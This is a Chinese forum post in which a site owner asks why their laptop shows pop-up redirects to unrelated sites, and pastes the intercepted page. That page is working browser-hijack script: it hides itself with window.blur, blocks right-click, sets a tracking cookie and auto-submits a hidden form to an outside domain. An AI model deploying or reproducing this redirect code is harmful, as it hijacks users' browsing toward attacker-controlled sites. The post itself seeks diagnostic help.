请大家帮忙分析一下下面代码 谢谢各位
我的网站从我笔记本上打开或关闭时,会自动弹出不同的网址,我的系统是深度GHOST版
在别的电脑上打开我的网站不会弹出网址
后来在弹出网址前,我点了停止键,发现有下面的代码,请大家帮忙分析一下,为什么会出现这样的情况
我的网站页面中并没有这样的跳转 我的网站中的代码只有判断域名然后跳转不同的首页 但没有下面的代码啊
下面的代码是怎么产生的呢? 我的笔记本用360查毒也没有查出来
是哪里出了问题了?
这个问题一直困扰着我,一直没有解决!谢谢各位了!
<html><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>sina sync page</title><body oncontextMenu="return false" onload="window.blur()" onfocus="window.blur()"><form name="myRedictForm" method="post" target="_top" action="http://ynuljmikolpqazws1xed.7z66.com/"><input type="hidden" name="action" value="go2"><input type="hidden" name="key" value="5737"></form><script language="javascript">if (navigator.cookieEnabled && document.cookie.indexOf("has_bop1=")!=-1 && document.cookie.indexOf("has_bop1=1")==-1){var url_,pos1_,pos2_;url_=location.href.toLowerCase();pos1_=url_.indexOf("http://");if(pos1_!=-1){pos2_=url_.indexOf("/",pos1_+7);if (pos2_!=-1){location.href/*go*/=url_.substr(pos1_,pos2_)+"//"+url_.substr(pos2_+1);}else{location.href/*go*/=url_+"?"}}else{location.href/*go*/=url_+"?"}}else{document.cookie="has_bop1=2";document.forms.myRedictForm.submit();setTimeout("document.forms.myRedictForm.submit()",10000)}</script></body></html>